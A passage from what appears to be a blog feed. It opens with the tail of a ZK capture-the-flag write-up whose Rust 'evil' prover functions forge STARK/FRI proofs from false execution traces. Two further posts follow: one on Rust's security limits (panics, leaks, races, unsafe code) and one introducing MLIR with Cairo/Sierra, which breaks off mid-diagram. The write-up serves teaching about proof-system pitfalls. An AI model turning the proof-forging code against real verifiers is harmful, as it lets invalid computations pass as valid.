}</span></span></code></pre>
which uses the following function to interpolate</p>
pub fn interp_from_num_denom<F: IsFFTField>(</span></span>
    num: &Polynomial<FieldElement<F>>,</span></span>
    denom: &Polynomial<FieldElement<F>>,</span></span>
    domain: &Domain<F>,</span></span>
) -> Polynomial<FieldElement<F>> {</span></span>
    let target_deg = domain.lde_roots_of_unity_coset.len() / domain.blowup_factor;</span></span>
    let num_evals = evaluate_polynomial_on_lde_domain(</span></span>
        num,</span></span>
        domain.blowup_factor,</span></span>
        domain.interpolation_domain_size,</span></span>
        &domain.coset_offset,</span></span>
    )</span></span>
    .unwrap();</span></span>
    let denom_evals = evaluate_polynomial_on_lde_domain(</span></span>
        denom,</span></span>
        domain.blowup_factor,</span></span>
        domain.interpolation_domain_size,</span></span>
        &domain.coset_offset,</span></span>
    )</span></span>
    .unwrap();</span></span>
    let evals: Vec<_> = num_evals</span></span>
        .iter()</span></span>
        .zip(denom_evals)</span></span>
        .map(|(num, denom)| num / denom)</span></span>
        .collect();</span></span>
</span>
    Polynomial::interpolate(</span></span>
        &domain.lde_roots_of_unity_coset[..target_deg],</span></span>
        &evals[..target_deg],</span></span>
    )</span></span>
    .unwrap()</span></span>
}</span></span></code></pre>
This way, we can choose $n$ points where the fake DEEP composition polynomial will pass all the tests. Since the verifier can choose among $\beta n$ points, the prover gets a $1/\beta$ chance to pass the test.</p>
We can now create a malicious prover that will likely pass the verifier’s checks, even if he uses false execution traces. Step_2 is modified to calculate the exact composition polynomial:</p>
fn step_2_evil_eval<F: IsFFTField, A: AIR<Field = F>>(</span></span>
    air: &A,</span></span>
    domain: &Domain<F>,</span></span>
    transition_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
    boundary_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
    rap_challenges: &A::RAPChallenges,</span></span>
    z: &FieldElement<F>,</span></span>
    trace_ood_frame_evaluations: &Frame<F>,</span></span>
) -> FieldElement<F> {</span></span>
    // BEGIN TRACE <-> Composition poly consistency evaluation check</span></span>
    // These are H_1(z^2) and H_2(z^2)</span></span>
</span>
    let boundary_constraints = air.boundary_constraints(rap_challenges);</span></span>
</span>
    //let n_trace_cols = air.context().trace_columns;</span></span>
    // special cases.</span></span>
    let trace_length = air.trace_length();</span></span>
    let composition_poly_degree_bound = air.composition_poly_degree_bound();</span></span>
    let boundary_term_degree_adjustment = composition_poly_degree_bound - trace_length;</span></span>
    let number_of_b_constraints = boundary_constraints.constraints.len();</span></span>
</span>
    // Following naming conventions from https://www.notamonadtutorial.com/diving-deep-fri/</span></span>
    let (boundary_c_i_evaluations_num, mut boundary_c_i_evaluations_den): (</span></span>
        Vec<FieldElement<F>>,</span></span>
        Vec<FieldElement<F>>,</span></span>
    ) = (0..number_of_b_constraints)</span></span>
        .map(|index| {</span></span>
            let step = boundary_constraints.constraints[index].step;</span></span>
            let point = &domain.trace_primitive_root.pow(step as u64);</span></span>
            let trace_idx = boundary_constraints.constraints[index].col;</span></span>
            let trace_evaluation = &trace_ood_frame_evaluations.get_row(0)[trace_idx];</span></span>
            let boundary_zerofier_challenges_z_den = z - point;</span></span>
</span>
            let boundary_quotient_ood_evaluation_num =</span></span>
                trace_evaluation - &boundary_constraints.constraints[index].value;</span></span>
</span>
            (</span></span>
                boundary_quotient_ood_evaluation_num,</span></span>
                boundary_zerofier_challenges_z_den,</span></span>
            )</span></span>
        })</span></span>
        .collect::<Vec<_>>()</span></span>
        .into_iter()</span></span>
        .unzip();</span></span>
</span>
    FieldElement::inplace_batch_inverse(&mut boundary_c_i_evaluations_den);</span></span>
</span>
    let boundary_degree_z = z.pow(boundary_term_degree_adjustment);</span></span>
    let boundary_quotient_ood_evaluation: FieldElement<F> = boundary_c_i_evaluations_num</span></span>
        .iter()</span></span>
        .zip(&boundary_c_i_evaluations_den)</span></span>
        .zip(boundary_coeffs)</span></span>
        .map(|((num, den), (alpha, beta))| num * den * (alpha * &boundary_degree_z + beta))</span></span>
        .fold(FieldElement::<F>::zero(), |acc, x| acc + x);</span></span>
</span>
    let transition_ood_frame_evaluations =</span></span>
        air.compute_transition(trace_ood_frame_evaluations, rap_challenges);</span></span>
</span>
    let divisor_x_n = (z.pow(trace_length) - FieldElement::<F>::one()).inv();</span></span>
</span>
    let denominators = air</span></span>
        .transition_exemptions_verifier()</span></span>
        .iter()</span></span>
        .map(|poly| poly.evaluate(z) * &divisor_x_n)</span></span>
        .collect::<Vec<FieldElement<F>>>();</span></span>
</span>
    let degree_adjustments = air</span></span>
        .context()</span></span>
        .transition_degrees()</span></span>
        .iter()</span></span>
        .map(|transition_degree| {</span></span>
            let degree_adjustment =</span></span>
                composition_poly_degree_bound - (trace_length * (transition_degree - 1));</span></span>
            z.pow(degree_adjustment)</span></span>
        })</span></span>
        .collect::<Vec<FieldElement<F>>>();</span></span>
</span>
    let transition_c_i_evaluations_sum =</span></span>
        ConstraintEvaluator::<F, A>::compute_constraint_composition_poly_evaluations_sum(</span></span>
            &transition_ood_frame_evaluations,</span></span>
            &denominators,</span></span>
            &degree_adjustments,</span></span>
            transition_coeffs,</span></span>
        );</span></span>
</span>
    &boundary_quotient_ood_evaluation + transition_c_i_evaluations_sum</span></span>
}</span></span></code></pre>
Then, step_3 is changed to</p>
fn round_3_evil<F: IsFFTField, A: AIR<Field = F>>(</span></span>
    air: &A,</span></span>
    domain: &Domain<F>,</span></span>
    round_1_result: &Round1<F, A>,</span></span>
    z: &FieldElement<F>,</span></span>
    boundary_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
    transition_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
) -> Round3<F></span></span>
where</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    let trace_ood_evaluations = Frame::get_trace_evaluations(</span></span>
        &round_1_result.trace_polys,</span></span>
        z,</span></span>
        &air.context().transition_offsets,</span></span>
        &domain.trace_primitive_root,</span></span>
    );</span></span>
</span>
    let (composition_poly_even_ood_evaluation, composition_poly_odd_ood_evaluation) = {</span></span>
        let trace_ood_frame_evaluations = Frame::new(</span></span>
            trace_ood_evaluations.iter().flatten().cloned().collect(),</span></span>
            round_1_result.trace_polys.len(),</span></span>
        );</span></span>
</span>
        let hz_exact_from_trace = step_2_evil_eval(</span></span>
            air,</span></span>
            domain,</span></span>
            transition_coeffs,</span></span>
            boundary_coeffs,</span></span>
            &round_1_result.rap_challenges,</span></span>
            z,</span></span>
            &trace_ood_frame_evaluations,</span></span>
        );</span></span>
</span>
        (hz_exact_from_trace, FieldElement::<F>::from(0))</span></span>
    };</span></span>
</span>
    Round3 {</span></span>
        trace_ood_evaluations,</span></span>
        composition_poly_even_ood_evaluation,</span></span>
        composition_poly_odd_ood_evaluation,</span></span>
    }</span></span>
}</span></span></code></pre>
Finally, round_4 is</p>
fn round_4_evil<F: IsFFTField, A: AIR<Field = F>, T: Transcript>(</span></span>
    air: &A,</span></span>
    domain: &Domain<F>,</span></span>
    round_1_result: &Round1<F, A>,</span></span>
    round_2_result: &Round2<F>,</span></span>
    round_3_result: &Round3<F>,</span></span>
    z: &FieldElement<F>,</span></span>
    transcript: &mut T,</span></span>
) -> Round4<F></span></span>
where</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    let coset_offset_u64 = air.context().proof_options.coset_offset;</span></span>
    let coset_offset = FieldElement::<F>::from(coset_offset_u64);</span></span>
</span>
    // <<<< Receive challenges: 𝛾, 𝛾'</span></span>
    let composition_poly_coeffients = [</span></span>
        transcript_to_field(transcript),</span></span>
        transcript_to_field(transcript),</span></span>
    ];</span></span>
    // <<<< Receive challenges: 𝛾ⱼ, 𝛾ⱼ'</span></span>
    let trace_poly_coeffients = batch_sample_challenges::<F, T>(</span></span>
        air.context().transition_offsets.len() * air.context().trace_columns,</span></span>
        transcript,</span></span>
    );</span></span>
</span>
    // Compute p₀ (deep composition polynomial)</span></span>
    let deep_composition_poly = compute_deep_composition_poly_evil(</span></span>
        air,</span></span>
        domain,</span></span>
        &round_1_result.trace_polys,</span></span>
        round_2_result,</span></span>
        round_3_result,</span></span>
        z,</span></span>
        &domain.trace_primitive_root,</span></span>
        &composition_poly_coeffients,</span></span>
        &trace_poly_coeffients,</span></span>
    );</span></span>
</span>
    let domain_size = domain.lde_roots_of_unity_coset.len();</span></span>
</span>
    // FRI commit and query phases</span></span>
    let (fri_last_value, fri_layers) = fri_commit_phase(</span></span>
        domain.root_order as usize,</span></span>
        deep_composition_poly,</span></span>
        transcript,</span></span>
        &coset_offset,</span></span>
        domain_size,</span></span>
    );</span></span>
    let (query_list, iotas) = fri_query_phase(air, domain_size, &fri_layers, transcript);</span></span>
    let fri_layers_merkle_roots: Vec<_> = fri_layers</span></span>
        .iter()</span></span>
        .map(|layer| layer.merkle_tree.root)</span></span>
        .collect();</span></span>
</span>
    let deep_poly_openings =</span></span>
        open_deep_composition_poly(domain, round_1_result, round_2_result, &iotas);</span></span>
</span>
    // grinding: generate nonce and append it to the transcript</span></span>
    let grinding_factor = air.context().proof_options.grinding_factor;</span></span>
    let transcript_challenge = transcript.challenge();</span></span>
    let nonce = generate_nonce_with_grinding(&transcript_challenge, grinding_factor)</span></span>
        .expect("nonce not found");</span></span>
    transcript.append(&nonce.to_be_bytes());</span></span>
</span>
    Round4 {</span></span>
        fri_last_value,</span></span>
        fri_layers_merkle_roots,</span></span>
        deep_poly_openings,</span></span>
        query_list,</span></span>
        nonce,</span></span>
    }</span></span>
}</span></span></code></pre>
This way, we generate a proof that will always pass the out-of-domain point consistency check and will have a high probability of passing the low-degree test.</p>
Summary</h1>
This post covered the challenges we presented at the first Lambda-Ingo ZK CTF and their solutions. The challenges involved some common attacks on Plonk (frozen heart and lack of blinding polynomials) and FRI to generate fake proofs or recover information from the witnesses. We will be adding more exercises and case studies to the Lambdaworks exercises repo</a> so that anyone can learn how to build a proving system and some common pitfalls and vulnerabilities that may arise in their implementation. We would like to thank Ingonyama again for their fantastic work and all the sponsors at LambdaZK week in Paris. Stay tuned for more challenges on ZK!</p>


Please stop drinking the Rust Kool-Aid
Unknown — Wed, 24 May 2023 00:00:00 +0000
We’ve been using Rust since 2014. We’re big fans of Rust. This doesn’t imply that Rust is the perfect language that solves all your problems. Security vulnerabilities come in a wide array of flavors. Some of them allow a malicious actor to take over a system. Others allow to peek at information they shouldn’t be able to. Smaller ones, but critical too, allow a malicious actor to shut down a service relatively cheaply. This kind of attack is called DoS, a denial of service. Shutdown systems are expensive for real people.It’s even worse if the system shutdowns without external interference.</p>
Some days ago, Péter Szilágyi, team lead at Ethereum, said that the C version of the KZG library crashed on some systems:</p>
</a></p>
If we want to build safe and robust systems, they need to take into account the possibility of crashes, whether they’re written in C, Rust, Erlang or Java. Rust Language is one of the most used for new performant systems.</p>
Rust introduces a great new concept about memory management and prevents many categories of bugs at compile time. It prevents you from accessing invalid memory positions, a null pointer, double-freeing the memory, or using freed memory.</p>
The concept behind this is excellent: don’t trust the programmer for this memory management when the compiler can do the hard work. The cost to pay here is that it is a bit harder to code.</p>
If you have long-living software, e.g., a web server, a blockchain node, or something like that, a crash means that your system is out of service.

For example, if you have a node receiving a request from the public, when you crash, you get your node off. That’s a vulnerability of your system.

Resiliency comes not only from the lone program processing traffic and data, but also from the surrounding system monitoring it and the state and error management within it. They key in this case is what happens when you hace unexpected failures.</p>
Memory leaks</h2>
Memory leaks</strong> are a subtle bug that is difficult to see and address.</p>
A memory leak occurs when a program manages memory allocations in a way that memory that is no longer needed is not released.</p>
In Rust, it’s hard to have Reference Cycles. You can do that with and Rc </em> and RefCell </em></a>. Rust does not guarantee the absence of memory leaks, even in safe code. Dealing with Reference Cycles is easy to fall into a leak because neither of the two references is freed.</p>
This situation can be hard to detect by inspecting the source code.</p>
Many other situations can lead to a memory leak, such as functions running in async code (especially when you mix them with threads).</p>
In a long-living program, many memory leaks can lead to a denial of service because the whole system can run out of memory.</p>
Error handling and panic</h2>
Rust has some tools for error handling, encoding the error value in the Result</em> enum. There are no exceptions</em> like in other languages. On the other side, Rust has the concept of panicking.</p>
</p>
Panics terminate the running program.</p>
Rust prefers panics before undefined behaviour, which is hard to track and debug.</p>
That being said, a panic in Rust usually occurs when a condition that absolutely must not happen is reached.</p>
Rust book has a section about panicking:

https://doc.rust-lang.org/book/ch09-03-to-panic-or-not-to-panic.html#to-panic-or-not-to-panic</a></p>
The most obvious (and probably the most used) way of getting a panic is unwrapping a Result when it’s an Err.</p>
Sometimes panics are hidden in harmless operations, like accessing arrays by index with [ ]</strong> operator (when the index is out of bound) or doing mathematical operations (like diving by zero).</p>
It’s worth mentioning that the std has functions to avoid panics in such operations. For example, the get()</em> accesses an element by index returning an Option value, not panicking.</p>
Threads safety</h1>
While Rust provides “ Fearless concurrency</em> ,” the language doesn’t guarantee there won’t be bugs or security issues derived from concurrency.</p>
Concurrency</strong> is about scheduling instructions between threads in the CPU (in one or more cores). This scheduling is arbitrary, and we call a scenario to one possible order of execution of those atomic instructions of different threads.</p>
While we have checks that guarantee each thread has access to the data we intend to, and there isn’t some accidental sharing of memory, we can still write code with Deadlocks or Race Conditions.</p>
Rust compiler can’t check (at compile time) that your multi-thread program has a possible deadlock. So Rust doesn’t guarantee your program will not get stuck in a stalemate. In that situation, your program doesn’t progress.</p>
For example, we could have a channel expecting data that never comes, blocking its thread. While this is easy to spot with one thread, if we have multiple threads using multiple channels and shared data with locks, this can be harder to see. In concurrency, this is called starvation</strong>.</p>
Quoting the Rustonomicon Rust does not prevent general race conditions.</strong> A typical race condition can occur when you check a system condition and then take action based on that condition. This is called time-of-check to time-of-use</strong> (TOC/TOU). Due to the interleaving of operations between threads, the state of the condition can change with the execution of another thread. So, the action taken by the first thread is invalid (in other words, you decide with old information</em>).</p>
Macros</h2>
Rust has a powerful feature of macros. They can expand the possibilities of the language in some places the functionalities are too restrictive. For example, given that Rust has a strongly typed system, the arguments of a function are fixed in the quantity and its type. With macros, we can have a function-style invocation with a variadic quantity and type of arguments. println!</code> is the perfect example of that.</p>
A good characteristic of Rust macros is that they are hygienic. This means that the body of the macro is expanded and executed in the context of the macro itself, without taking extra context of the piece of code where the macro is invoked. This feature prevents dangerous and non-expected behavior that can happen in C programs (and hard to debug), due to the inclusion of other variables.</p>
Having said that, the abuse of macros is harmful. First of all, macros make the compilation time slower. The worst part is that the bad practices about macros can lead to a hard comprehension of the code. In practice, they introduce new “keywords” to the language and a re-definition of some rules. The fact that you can receive multiple types in the same macros can be confusing for the reader of the code.</p>
Unsafe</h2>
Unsafe</code> in Rust is the key that opens the door to non-checked memory and variables. One of the strengths of the language is the borrow checker and the restriction about how memory is used. Unsafe</code> gives that power but also the responsibility to the programmer.</p>
There are indeed some circumstances where there is no choice. In the case we have Rust code interfacing with C code, given that C is an “unsafe” language (from Rust’s perspective), FFI invocations are unsafe</em>.</p>
The use of unsafe makes our code more vulnerable (e.g. accessing a non-checked memory position is always dangerous).

Unsafe</code> blocks must be carefully audited.</p>
Conclusion</h2>
Engineering is not a science. Bugs can still occur even with the best practices in place. However, by using languages like Rust and being mindful of potential vulnerabilities like panic situations and concurrency issues, we can minimize the risks of these bugs causing harm to our systems.</p>
It’s important to remember that we are all human, and mistakes can happen. Still, by working together and communicating any bugs or issues in each other’s code, we can create safer and more robust systems for everyone. So let’s keep collaborating and striving towards better, more secure programming practices.</p>


Exciting times at the intersection of Compilers and Applied Cryptography: Cairo and MLIR
Unknown — Wed, 03 May 2023 00:00:00 +0000
Making a Cairo

not reinventing the wheel</p>

I love jazz.

Of all the jazz styles I love, jazz fusion is the one I enjoy most because I find any fusion of different things more stimulating.

Something exciting is happening at the intersection of programming language theory, compiler implementation, and applied cryptography.</p>
But the thing with jazz fusion is that it’s harder to get into unless you’re familiar with the elements being combined.

Let me show you a few songs and how we’re mixing it up.

If you’re familiar with one of these topics, bear with us; I promise it’s worth it.</p>
Put on your seatbelts.

3, 2, 1…</p>
</p>
Intro beat</h2>
Compilers & LLVM</h3>
Some 20-something years ago, a group of compiler researchers at the University of Illinois needed a more flexible infrastructure.

What they developed became known as LLVM and has since become the foremost compiler tooling project.

It powers many of the compilers’ analysis and code generation components for Clang, Swift, Rust, and many more languages.</p>
From the 2004 CGO paper</a> introducing it:</p>

The LLVM compiler framework and code representation combine key capabilities that are important for practical, lifelong analysis and transformation of programs.</p>
</blockquote>
At the heart of LLVM is LLVM IR, its Intermediate Representation.

IRs are a combination of data formats and algorithms that allow the best expression of the properties a tool wishes to guarantee or prove about code.</p>
An example of this is the fact that LLVM IR is what’s known as an SSA form, or Static Single Assignment, in which each variable will have a value assigned only once.

This allows the compiler to reason about it better than others. Otherwise, it enables analysis and optimizations, such as dead code elimination, constant propagation, and constant folding, and facilitates other stages, such as register allocation.</p>
All this to say that IRs are a compiler writer’s way of solving problems by building abstraction ladders, and LLVM became the de facto backend platform for modern compilers.</p>
Rise of AI</h3>
You may know that machine learning algorithms and their applications are now a big deal.

The driver of many economic fortunes and solutions to problems we only dreamed of solving before, the statistical school of AI has settled (?) on a set of techniques that involve dealing with numerical operations on enormous matrices of numbers and stringing together large numbers of these operations into computation graphs.

These computational graphs’ fundamental elements are matrix multiplications, convolutions, data manipulations, and data movements.

This sounds very computationally expensive, and it is. So the industry has (and is) going to great lengths to scale these approaches, making them cheaper and more effective on ever larger data sets.</p>
A key observation was made at some point: many of the problems these algorithms solve have inherent or given parallelism, and we already had industry-producing machines designed explicitly for embarrassingly parallel numerical problems, namely shaders running on GPUs.

Thus the first wave of this effort was repurposing video graphics card hardware to make them applicable to this new area.</p>
Why did we change the tune from LLVM to AI and graphics card? Because as they matured, these algorithms, models, techniques, tools, and libraries were standardized into frameworks that could be used by many non-specialist programmers and that required appropriate languages in which to express them and their compilers.</p>
Since LLVM had an IR that could, with some effort, be abstracted over GPU processors, it was used in tools such as PyTorch and Tensorflow to produce the code that would run on these graphical processing units.

New hardware was designed, and LLVM was again used to target these new tensor processing units.</p>
As a result, Tensorflow has several compiler components embedded in it, made by different vendors: Google has XLA, NVIDIA has TensorRT, and Intel has NGraph, all of which integrate with the TensorFlow optimizer and code generator and are very hardware specific, but do not share common infrastructure.</p>
</p>
Back to languages</h3>
In these intervening years since the early 2000s, the pendulum has swung back from dynamic to statically typed languages with more advanced type systems and code analysis phases.

LLVM enabled Clang and new languages such as Rust, Julia, and Swift.

Something these projects share in common is that they have found that many language implementation problems are best modeled at higher abstraction levels and implemented their intermediate representations to solve domain-specific problems, like language/library-specific optimizations, flow-sensitive type checking (e.g., for linear types), and to improve the implementation of the lowering process.

Swift has SIL, Rust has MIR, and so on.</p>
</p>
In other words, people started to realize that the complexity of the software stack above the low-level IR was very high since software reuse was low and quality was so variable.</p>
After twenty years of expanding hardware targets and changing problem spaces, LLVM was found lacking in certain areas.</p>
What (is MLIR?)</h2>
</p>
Out of this came MLIR</a> (Multi-Level Intermediate Representation), a project started by Chris Lattner et al. to build a common infrastructure to support all these different subsystems and to learn from the mistakes made and lessons learned in the development of LLVM.</p>
I highly encourage you to read the introductory paper</a> from whence these graphics came, as it is very readable, or to listen to the talk</a> Lattner and Shpeisman gave presenting it.</p>

MLIR aims to address software fragmentation, improve compilation for heterogeneous hardware, significantly reduce the cost of building domain-specific compilers, and aid in connecting existing compilers.</p>
</blockquote>
There are several types of intermediate representations: linear (like assembly, a sequence of instructions), tree-like (like ASTs), and graph-like (like data flow or call graphs).

As the project site states, “MLIR is intended to be a hybrid IR which can support multiple different requirements in a unified infrastructure.”</p>
Unlike LLVM IR, where one central IR contains a complete set of instructions to represent the CPU/GPU programs, in MLIR, there is no one IR.</p>
Instead, MLIR provides a set of very abstract concepts: dialects, operations, regions, etc.</p>
From the glossary</a>:</p>
> A dialect is a grouping of functionality that can be used to extend the MLIR system.</span></span>
> A dialect creates a unique namespace within which new operations, attributes, and types are defined.</span></span>
> This is the fundamental method by which to extend MLIR.</span></span>
> In this way, MLIR is a meta-IR: its extensible framework allows it to be leveraged in many different ways</span></span></code></pre>
An operation</strong> is a unit of code in MLIR.

Operations are the building blocks for all code and computations represented by MLIR.

They are fully extensible (no fixed list of operations) and have application-specific semantics.</p>
When implementing the code emitter, operations could map to processor instructions.

When implementing an AST, nodes representing type conversions, function calls, and language operands could be mapped to operations.</p>
Operations can have an arbitrary number of operands, results, and attributes and may contain an arbitrary number of regions.</p>
A region</strong> is a control flow graph of MLIR blocks.</p>
A block</strong> , or basic Block, is a sequential list of operations without control flow.</p>
Note that this creates a nested IR structure, as regions consist of blocks, which in turn, consist of a list of operations.

Regions are a powerful mechanism to allow nested operations and localize information, simplifying code analysis and transformation.</p>
A module</strong> is an operation containing a single region containing a single block comprised of operations, providing an organizational structure for MLIR operations.</p>
MLIR allows multiple dialects, even those outside of MLIR’s codebase, to co-exist within one module.</p>
In the context of MLIR, conversion is distinct from translation.

The transformation of code represented in a dialect is called conversion. It can be either inter-dialect (when the conversion is into a semantically equivalent representation in another dialect) or intra-dialect. In contrast, translation is a transformation between MLIR and an external representation.</p>
Thus an application using MLIR will typically use a collection of dialects as needed.</p>
What are the advantages of LLVM?</h3>
So you’re writing a compiler or need to add a backend to an existing compiler.

Aside from code reuse across the industry, what advantages does MLIR provide? Why would you choose it over LLVM?</p>
To begin with, the choice is not that binary since MLIR includes an LLVM IR dialect to which you can convert your application-specific dialect and thus leverage the existing LLVM toolchain.</p>
MLIR also tries to provide universal patterns or passes that can apply to suitable operations without hardcoding them.</p>
So MLIR allows you to easily defined your dialect, pick from a growing ecosystem of middle and low-level dialects targeting different computation models, and integrate them into your domain-specific compiler.</p>
As Lei Zhang</a> says:</p>

In other words, if LLVM IR is centralized by nature and favors unified compiler flows, the MLIR infrastructure and its dialect ecosystem are decentralized by nature and favor diverse compiler flows.

What is quite powerful is that MLIR enables different levels to be represented using the same infrastructure; so that the flow between different levels can become seamless.</p>
</blockquote>
The UNIX way!</p>
</p>
Other benefits include:</p>
    * Source code location tracking by default (each operand has a source code memory address attribute, so errors directly point to the line of source code in which the error occurred)</span></span>
    * All functions run on multiple cores by default</span></span>
    * Optimizations done by other languages can be reused</span></span>
    * Reuse LLVM for machine code generation</span></span></code></pre>
Finally, suppose your domain does benefit from running all or some of your code in a GPU, TPU, or ASIC. In that case, MLIR provides a way to reuse an existing dialect targeting that computation model and hardware by writing a conversion to it and plugging in a code generator for final translation.</p>
It includes dialects for SPIR-V, a general GPU</a> dialect, and specific ones for NVidia</a> and AMD</a> GPUs.</p>
All these advantages are direct results of MLIR’s abstraction level.</p>
Why?</h2>
Let’s change the tune again.</p>
In the land of blockchains, cryptocurrencies, and distributed finance, several developments have converged:</p>
First, the more established blockchains have paralleled the story in the machine learning world, offloading as much hashing as possible to GPUs and later ASICs (facing us mere mortals to scrabbling for the crumbs or resigned to playing emacs Tetris on my Raspberry Pi).

Newer chains and L2s are expected to follow the same path.</p>
Second, as their applications have become more mainstream (albeit with ups and downs), two concerns have taken center stage: scalability and privacy.

Blockchains are not known for their efficiency, so the effort has gone into trying to have the best of both worlds, in part by moving away from Proof of Work, moving work to L2s, and turning back to guarantees provided by cryptographic techniques.

As new techniques have been discovered and older ones have matured, Zero Knowledge Proof systems have emerged as the predominant area from which solutions to these two problems can be built.</p>
But as is well known, despite a good amount of gatekeeping, cryptography is not something one can pick up over the weekend and “roll one’s own,” especially in developing areas such as ZKP.

It’s not just</em> that their proper use is complex or that many components are still in alpha, but because translating computation in a programming language to a form that can be input to these cryptographic primitives takes a lot of work and some ingenuity.

Most ZKP protocols involve arithmetization, which is the process of representing computation in a numerical format that can be used by the proving system, usually by taking the instructions in the computation and building an expression graph of operations on bits called an arithmetic circuit and then generating an execution trace</em> , which very briefly is a matrix of field elements representing the evolution of the computation over time.

This execution trace is fed to the prover.</p>
To encapsulate these processes, virtual machines have been designed and implemented to generate these numerical execution traces and provide computational guarantees, such as Miden</a> and cairo-rs</a>.

Once you have a virtual machine, you need a compiler and an intermediate representation.</p>
You also can’t accept just any program since you need to know that its execution is provable unless you’re willing to take the possibility of nonterminating programs, invalid transactions which consume excessive gas, the production of invalid or incomplete traces, and having the prover just quit in the middle.

Type theory and intermediate representations within compilers have become one of the most potent tools for producing code that has properties we can mechanically reason about and check.</p>
So, in short, the need to run on more diverse hardware, to incorporate programming language technology, to enable the easy use of complex cryptographic primitives, to transport guarantees from developer tooling to execution layers have all come together to bring about a small renaissance of language implementation in the crypto world.</p>
Cairo & Sierra</h3>
Cairo</a> is a “language for creating provable programs for general computation” through the use of STARK-based validity proofs.

If you’re not from a cryptography background, ZKP and STARKS are too deep a rabbit hole for one article spanning so many topics; STARKs enable blockchain scaling by efficiently proving the integrity of computations.</p>

STARKs (Scalable, Transparent Argument of Knowledge) is a proof system that enables the proving and verification of computations.

It allows processing a big computation, generating proof for the computation’s correctness, and verifying the proof in very few steps.</p>
    * [www.starknet.io](https://www.starknet.io/en/posts/engineering/starks-starkex-and-starknet)</span></span></code></pre></blockquote>
As Cairo matures, improvements have been added, such as a linear type system implementing ownership similar to Rust and an intermediate representation providing guarantees.

Programming in Cairo is a bit different than your average von Neumann machine-based language: programs written in it run under a nondeterministic, immutable, contiguous memory model to ensure that all relevant memory has proper values and that appropriate values are not destroyed before the proof is generated, i. e. all correct programs are provable.</p>
The Cairo compiler eventually compiles Cairo code to a “Cairo assembly,” which the virtual machines run to compute results and generate traces.

However, as mentioned before, not all representations are adequate for all tasks, so Cairo introduced Sierra (S</strong> afe I</strong> ntE</strong> rmediate R</strong> epR</strong> esentA</strong> tion).</p>
Sierra’s goal is to guarantee that the generated code is always provable, and it achieves this by several means.</p>
As mentioned, the memory model is immutable and contiguous and guarantees that memory will not be written twice, and thus, dereferences cannot fail.

The linear type system ensures that values are used exactly once,</p>
There are no loops, and recursion is used instead; coupled with a gas meter for operations, this ensures termination.</p>
Assertions and panics are converted to conditional branches.</p>
Why use MLIR in the context of Cairo?</h3>
Cairo is also being used to build StarkNet, a permissionless Ethereum layer 2 network on which provable smart contracts can be deployed.

Nodes on the network receive transactions and must verify they are valid before going about the business of generating the proof.

The contract code must be run with the transaction inputs to generate the state change, the proof, and verify.</p>
Another motivation is developer experience and tooling quality.

Before deploying said contracts, the code must be written and tested, and being able to run Cairo code faster improves turnaround time in the development loop.</p>
    * Enable faster checking of Cairo contract TX</span></span>
    * Faster Gas computation</span></span>
    * To enable better L2 sequencers</span></span>
    * To enable better developer tooling</span></span></code></pre>Sierra Structure</h3>
So what does Sierra look like?

We’ll see some examples shortly.

Briefly, Sierra is a linear intermediate representation.

A Sierra program consists of four sections:

The types used in a particular program

The libfuncs</em> used

The program statements

The descriptions of the user-defined functions</p>
/// A full Sierra program.</span></span>
#[derive(Clone, Debug, Eq, PartialEq)]</span></span>
pub struct Program {</span></span>
    /// Declarations for all the user types.</span></span>
    pub type_declarations: Vec<TypeDeclaration>,</span></span>
    /// Declarations for all the used library functions.</span></span>
    pub libfunc_declarations: Vec<LibfuncDeclaration>,</span></span>
    /// The code of the program.</span></span>
    pub statements: Vec<Statement>,</span></span>
    /// Descriptions of the functions - signatures and entry points.</span></span>
    pub funcs: Vec<Function>,</span></span>
}</span></span></code></pre>
Libfuncs (or library functions) are representations of calls to built-in functions whose implementations are vetted to be correct, then compiled to Cairo assembly.

The built-in libfuncs implementation is generic and can be specialized as defined in the libfunc declaration section.</p>
Statements can either invoke a libfunc or return a variable and are executed in sequence:</p>
/// A possible statement.</span></span>
#[derive(Clone, Debug, Eq, PartialEq)]</span></span>
pub enum GenStatement<StatementId> {</span></span>
    Invocation(GenInvocation<StatementId>),</span></span>
    Return(Vec<VarId>),</span></span>
}</span></span></code></pre>
User-defined functions have an identifier, their type signature and parameters, and a statement identifier that marks the function entry point among the program statements.</p>
pub type Function = GenFunction<StatementIdx>;</span></span>
</span>
/// Represents a function (its name, signature, and entry point).</span></span>
#[derive(Clone, Debug, Eq, PartialEq)]</span></span>
pub struct GenFunction<StatementId> {</span></span>
    /// The name of the function.</span></span>
    pub id: FunctionId,</span></span>
    /// The parameter types and return types.</span></span>
    pub signature: FunctionSignature,</span></span>
    /// The parameters of the function.</span></span>
    pub params: Vec<Param>,</span></span>
    /// The statement id where the function starts.</span></span>
    pub entry_point: StatementId,</span></span>
}</span></span></code></pre>How (does one use MLIR)?</h2>
In our application context, the Cairo & StarkNet software stack, most of it is transitioning to or being developed in Rust, so we would like to integrate with this language seamlessly.</p>
MLIR has a [C-compatible API](https://mlir.llvm.org/docs/CAPI/</a>, which can be easily interfaced with.

mlir-sys</a> provides auto-generated bindings to this interface, and melior</a> provides a somewhat more idiomatic wrapper around it.</p>
MLIR as a library is part of the LLVM distribution, so if you have the latest LLVM as a system library, you will have access to MLIR.</p>
Our project resides at github.com/lambdaclass/cairo_sierra2mlir</code></a>.

You can find detailed setup instructions that should leave you with a working development environment. When developing on Apple hardware, if you don’t want to make compile your own, store-bought brew-provided LLVM system libraries are fine.</p>
Our first task is to parse the provided Sierra program.

Fortunately, the Cairo compiler libraries provide excellent functionality:</p>
cairo_lang_sierra::ProgramParser::new()</span></span>
            .parse(fs::read_to_string(input).unwrap().as_str())</span></span>
            .unwrap(),</span></span></code></pre>
Once we have the Sierra representation in memory, we can start the translation process.

Here is a high-level overview:</p>
stateDiagram-v2</span></span>
    direction LR</span></span>
    state "Load sierra program" as Sierra</span></span>
    state "Initialize compiler" as init</span></span>
    state "Initialize execution engine" as engine</span></span>
    state if_skip_jit <<choice>></span></span>
    state "Load MLIR dialects" as dialects</span></span>
    state "Create built-in module" as module</span></span>
    state "Create libc wrappers" as libc</span></span>
    state "Process Types" as types</span></span>
    state "Process Library functions" as libfuncs</span></span>
    state "Save non-flow function info" as func_info</span></span>
    state "Process functions" as funcs</span></span>
    state "Calculate block ranges per function" as blocks</span></span>
